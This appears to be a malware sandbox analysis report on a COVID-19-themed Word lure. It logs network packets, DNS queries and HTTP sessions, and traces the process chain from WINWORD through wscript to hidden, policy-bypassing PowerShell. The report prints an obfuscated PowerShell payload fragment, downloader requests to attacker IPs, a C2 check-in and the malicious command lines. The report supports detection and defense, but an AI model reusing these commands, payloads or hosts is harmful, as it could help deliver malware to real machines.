                  Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 ce 90 01 00 ce 90 01 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 20, 2021 10:30:47.770090103 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.820573092 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.820684910 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.825139046 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:47.875634909 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.876494884 CET804971578.141.194.181192.168.2.4
                  Jan 20, 2021 10:30:47.876581907 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:30:49.941462994 CET4971580192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.507498026 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.557960033 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.558137894 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.561558008 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.611931086 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.612396002 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.642548084 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693434954 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693483114 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693521023 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693562984 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693572998 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693612099 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693643093 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693695068 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693721056 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693726063 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693743944 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693782091 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693820953 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.693829060 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693866968 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.693979979 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.744193077 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.744235039 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.744326115 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.746211052 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.746253967 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.746321917 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.749711990 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749752045 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749800920 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749847889 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.749849081 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.752094984 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.753180027 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.753228903 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.753417015 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.756684065 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.756721973 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.756962061 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.760227919 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.760268927 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.761044979 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.763766050 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.763806105 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.765451908 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.767246962 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.767288923 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.768304110 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.770920992 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.770972967 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.771089077 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.774302006 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.774342060 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.777378082 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.794632912 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.794684887 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.795335054 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.796355963 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.796399117 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.796504974 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.799854994 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.799895048 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.800288916 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.802906990 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.802944899 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.802993059 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.803041935 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.803075075 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.803210020 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.806061029 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.806106091 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.806346893 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.809079885 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.809124947 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.809431076 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.812136889 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.812176943 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.812335968 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.815232992 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.815273046 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.817435980 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.818331957 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.818387032 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.819453955 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.821363926 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.821432114 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.821737051 CET4972380192.168.2.478.141.194.181
                  Jan 20, 2021 10:31:45.824296951 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.824338913 CET804972378.141.194.181192.168.2.4
                  Jan 20, 2021 10:31:45.824511051 CET4972380192.168.2.478.141.194.181

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 20, 2021 10:30:38.375869989 CET5170353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:38.437462091 CET53517038.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:39.813987017 CET6524853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:39.875488997 CET53652488.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:41.119654894 CET5372353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:41.167717934 CET53537238.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:42.340919018 CET6464653192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:42.388814926 CET53646468.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:43.103338003 CET6529853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:43.151076078 CET53652988.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:46.207206011 CET5912353192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:46.255156040 CET53591238.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:47.952367067 CET5453153192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:48.000474930 CET53545318.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:49.031301975 CET4971453192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:49.084433079 CET53497148.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:50.229558945 CET5802853192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:50.277640104 CET53580288.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:51.352603912 CET5309753192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:51.408936977 CET53530978.8.8.8192.168.2.4
                  Jan 20, 2021 10:30:52.496892929 CET4925753192.168.2.48.8.8.8
                  Jan 20, 2021 10:30:52.557529926 CET53492578.8.8.8192.168.2.4
                  Jan 20, 2021 10:32:27.243122101 CET6238953192.168.2.48.8.8.8
                  Jan 20, 2021 10:32:27.302587032 CET53623898.8.8.8192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 20, 2021 10:32:27.243122101 CET192.168.2.48.8.8.80x7defStandard query (0)ifconfig.meA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.32.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.34.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.36.21A (IP address)IN (0x0001)
                  Jan 20, 2021 10:32:27.302587032 CET8.8.8.8192.168.2.40x7defNo error (0)ifconfig.me216.239.38.21A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • 78.141.194.181
                  • 45.67.229.125
                  • ifconfig.me

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44971578.141.194.18180C:\Windows\SysWOW64\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:30:47.825139046 CET180OUTGET /d569872345345.txt HTTP/1.1
                  Accept: */*
                  Accept-Language: en-us
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: 78.141.194.181
                  Connection: Keep-Alive
                  Jan 20, 2021 10:30:47.876494884 CET181INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:30:47 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Fri, 25 Dec 2020 16:29:47 GMT
                  ETag: "5a7-5b74c6eccbba7-gzip"
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 772
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00
                  Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)LSyE;V:,;Xk;7F39jkrtEp`M=7ar[I)F);WM$0>'<7qef<Md6O|[|LW^7d[2[6?&tu2++Mw_HgM7}{,^hB-V0Q|o(bt~.`Gz7`#B`x4L=HXjRm.BXVxG5I5*C'MuYRCGemFVnRT&4KR`g@\(*,]6r


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44972378.141.194.18180C:\Windows\SysWOW64\wscript.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:31:45.561558008 CET256OUTHEAD /s34987435987.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  User-Agent: Microsoft BITS/7.8
                  Host: 78.141.194.181
                  Jan 20, 2021 10:31:45.612396002 CET256INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:31:45 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Wed, 23 Dec 2020 13:46:16 GMT
                  ETag: "12932-5b721ea4eff8d"
                  Accept-Ranges: bytes
                  Content-Length: 76082
                  Vary: Accept-Encoding
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Jan 20, 2021 10:31:45.642548084 CET256OUTGET /s34987435987.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  If-Unmodified-Since: Wed, 23 Dec 2020 13:46:16 GMT
                  User-Agent: Microsoft BITS/7.8
                  Host: 78.141.194.181
                  Jan 20, 2021 10:31:45.693434954 CET258INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:31:45 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Wed, 23 Dec 2020 13:46:16 GMT
                  ETag: "12932-5b721ea4eff8d"
                  Accept-Ranges: bytes
                  Content-Length: 76082
                  Vary: Accept-Encoding
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: 53 65 74 2d 53 74 72 69 63 74 4d 6f 64 65 20 2d 56 65 72 73 69 6f 6e 20 32 0a 66 75 6e 63 74 69 6f 6e 20 73 49 5a 55 0a 7b 0a 24 42 69 59 4b 3d 4a 71 4b 4b 50 5a 20 27 37 27 0a 24 42 69 59 4b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 64 44 4a 42 59 0a 7b 0a 24 56 70 73 53 59 62 3d 41 78 4b 65 6d 44 20 41 20 76 20 68 20 65 20 54 20 55 20 54 20 49 0a 24 4d 6d 35 6d 49 56 3d 6f 58 6b 65 4a 20 46 20 63 20 27 32 27 20 71 0a 24 4c 32 74 6d 36 32 3d 41 55 76 78 6f 20 71 20 2b 20 4f 20 74 20 43 20 39 20 55 20 79 20 57 0a 24 4c 32 74 6d 36 32 2b 24 56 70 73 53 59 62 2b 24 4d 6d 35 6d 49 56 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 41 51 41 0a 7b 0a 50 61 72 61 6d 20 28 24 77 4c 38 7a 49 46 2c 24 51 66 4d 2c 24 75 79 67 31 2c 24 7a 6d 78 2c 24 66 52 4c 4e 65 53 2c 24 54 45 56 7a 29 0a 24 77 4c 38 7a 49 46 2b 24 75 79 67 31 2b 24 66 52 4c 4e 65 53 2b 24 7a 6d 78 2b 24 54 45 56 7a 2b 24 51 66 4d 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 78 4e 6b 71 6e 49 0a 7b 0a 24 51 6c 77 3d 45 53 59 63 71 20 71 20 55 20 63 0a 24 4a 54 51 3d 69 64 6d 77 20 41 20 65 20 55 20 63 20 6c 20 5a 20 44 20 41 20 58 20 50 20 2f 0a 24 4b 71 65 61 75 68 3d 46 76 41 57 63 20 49 20 57 20 43 20 54 0a 24 54 78 51 6a 57 3d 67 77 6d 79 63 20 55 20 69 20 31 20 2b 20 4f 20 2f 20 7a 20 4f 20 66 20 49 0a 24 47 74 4b 33 34 3d 65 59 75 62 47 20 43 20 6d 20 77 20 6a 20 79 20 77 20 74 20 7a 20 32 20 57 20 6c 20 70 20 42 20 49 0a 24 72 4a 73 72 4b 4d 3d 5a 79 4a 4c 69 62 20 53 20 66 20 45 0a 24 4e 65 35 6f 3d 6f 59 61 74 53 20 2f 20 59 20 57 20 43 20 58 20 73 20 54 20 53 20 75 20 48 20 66 20 74 20 36 0a 24 70 77 4e 77 38 70 3d 4c 6f 68 44 20 56 20 42 20 4b 20 4b 20 52 20 41 20 61 0a 24 4e 65 35 6f 2b 24 54 78 51 6a 57 2b 24 72 4a 73 72 4b 4d 2b 24 47 74 4b 33 34 2b 24 70 77 4e 77 38 70 2b 24 4b 71 65 61 75 68 2b 24 4a 54 51 2b 24 51 6c 77 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 75 75 51 77 77 0a 7b 0a 24 66 59 6d 42 70 3d 6f 59 61 74 53 20 6c 20 65 20 6c 20 44 20 64 20 65 20 63 20 74 20 65 20 65 20 52 20 66 20 65 0a 24 43 36 76 79 3d 5a 79 4a 4c 69 62 20 61 20 74 20 67 0a 24 5a 30 70 4e 76 3d 4a 71 4b 4b 50 5a 20 65 0a 24 66 59 6d 42 70 2b 24 43 36 76 79 2b 24 5a 30 70 4e 76 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 52 6a 56 72 0a 7b 0a 24 6c 69 68 76 77 58 3d 6a 5a 50 50 6d 20 63 0a 24 6c 69 68 76 77 58 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 7a 51 67 4d 66 67 0a 7b 0a 24 47 61 74 72 48 78 3d 6c 53 78 75 20 51 20 62 20 41 20 41 20 36 20 69 20 42 20 39 20 32 0a 24 6c 74 31 3d 64 74 55 43 6e 51 20 74 20 4a 20 65 20 6f 20 47 20 6d 20 7a 0a 24 46 79 53 3d 4a 71 4b 4b 50 5a 20 56 0a 24 46 49 41 39 3d 6f 58 6b 65 4a 20 51 20 55 20 67 20 55 0a 24 46 49 41 39 2b 24 6c 74 31 2b 24 47 61 74 72 48 78 2b 24 46 79 53 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 69 57 4c 76 67 0a 7b 0a 24 56 34 49 59 3d 6c 53 78 75 20 52 20 53 20 4b 20 48 20 5a 20 38 20 47 20 57 20 38 0a 24 4b 55 39 33 36 49 3d 57 49 57 51 4f 75 20 56 20 50 20 75 20 66 20 6e 20 73 20 32 20 6b 20 64 20 64 20 56 20 42 20 6d 20 79 0a 24 50 6f 52 44 53 66 3d 5a 79 4a 4c 69 62 20 75 20 37 20 72 0a 24 47 47 59 55 3d 4a 72 56 72 47 20 41 20 46 20 35 20 41 20 2b
                  Data Ascii: Set-StrictMode -Version 2function sIZU{$BiYK=JqKKPZ '7'$BiYK}function dDJBY{$VpsSYb=AxKemD A v h e T U T I$Mm5mIV=oXkeJ F c '2' q$L2tm62=AUvxo q + O t C 9 U y W$L2tm62+$VpsSYb+$Mm5mIV}function QAQA{Param ($wL8zIF,$QfM,$uyg1,$zmx,$fRLNeS,$TEVz)$wL8zIF+$uyg1+$fRLNeS+$zmx+$TEVz+$QfM}function xNkqnI{$Qlw=ESYcq q U c$JTQ=idmw A e U c l Z D A X P /$Kqeauh=FvAWc I W C T$TxQjW=gwmyc U i 1 + O / z O f I$GtK34=eYubG C m w j y w t z 2 W l p B I$rJsrKM=ZyJLib S f E$Ne5o=oYatS / Y W C X s T S u H f t 6$pwNw8p=LohD V B K K R A a$Ne5o+$TxQjW+$rJsrKM+$GtK34+$pwNw8p+$Kqeauh+$JTQ+$Qlw}function QuuQww{$fYmBp=oYatS l e l D d e c t e e R f e$C6vy=ZyJLib a t g$Z0pNv=JqKKPZ e$fYmBp+$C6vy+$Z0pNv}function RjVr{$lihvwX=jZPPm c$lihvwX}function zQgMfg{$GatrHx=lSxu Q b A A 6 i B 9 2$lt1=dtUCnQ t J e o G m z$FyS=JqKKPZ V$FIA9=oXkeJ Q U g U$FIA9+$lt1+$GatrHx+$FyS}function iWLvg{$V4IY=lSxu R S K H Z 8 G W 8$KU936I=WIWQOu V P u f n s 2 k d d V B m y$PoRDSf=ZyJLib u 7 r$GGYU=JrVrG A F 5 A +


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44972445.67.229.12580C:\Windows\SysWOW64\svchost.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:32:26.612793922 CET336OUTGET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1
                  Host: 45.67.229.125
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Accept: */*
                  Jan 20, 2021 10:32:26.695453882 CET336INHTTP/1.1 200 OK
                  Server: Apache
                  Date: Wed, 20 Jan 2021 01:32:26 GMT
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.449725216.239.32.2180C:\Windows\SysWOW64\svchost.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:32:27.680223942 CET338OUTGET // HTTP/1.1
                  Host: ifconfig.me
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
                  Accept: */*
                  Connection: close
                  Jan 20, 2021 10:32:27.831789970 CET339INHTTP/1.1 302 Found
                  Date: Wed, 20 Jan 2021 09:32:27 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 43
                  Access-Control-Allow-Origin: *
                  Location: https://ifconfig.me//
                  Vary: Accept
                  Via: 1.1 google
                  Connection: close
                  Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 69 66 63 6f 6e 66 69 67 2e 6d 65 2f 2f
                  Data Ascii: Found. Redirecting to https://ifconfig.me//


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:10:30:42
                  Start date:20/01/2021
                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                  Imagebase:0x3c0000
                  File size:1937688 bytes
                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:30:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
                  Imagebase:0x3e0000
                  File size:147456 bytes
                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmp, Author: Florian Roth
                  Reputation:high

                  General

                  Start time:10:30:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:10:30:48
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:08
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
